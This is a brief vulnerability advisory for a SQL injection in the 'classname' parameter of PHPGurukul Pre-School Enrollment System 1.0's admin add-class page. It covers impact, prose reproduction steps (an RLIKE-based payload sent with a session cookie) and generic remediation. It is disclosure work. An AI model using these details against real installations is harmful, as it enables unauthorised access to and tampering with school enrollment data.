PHPGurukul Pre-School Enrollment System SQL Injection Vulnerability

A critical SQL injection vulnerability has been identified in PHPGurukul Pre-School Enrollment System version 1.0. The issue resides in the '/admin/add-class.php' file, where the 'classname' parameter is manipulated, allowing attackers to inject malicious SQL code. This vulnerability can be exploited remotely, with public knowledge of the exploit available.

Impact

Exploitation of this vulnerability allows unauthorized access to the database, manipulation or deletion of data, and leakage of sensitive information. It could also lead to complete control over the system and disruption of services.

Reproduction

To reproduce this vulnerability, send a POST request to '/preschool/admin/add-class.php' with the 'classname' parameter crafted to include a SQL injection payload, such as one that uses SQL's RLIKE operator to test for injection vulnerabilities. The request can be made using a tool like Burp Suite, and should include a valid PHP session cookie.

Remediation

No specific remediation is known, but general best practices for preventing SQL injection should be followed, such as using prepared statements and parameterized queries.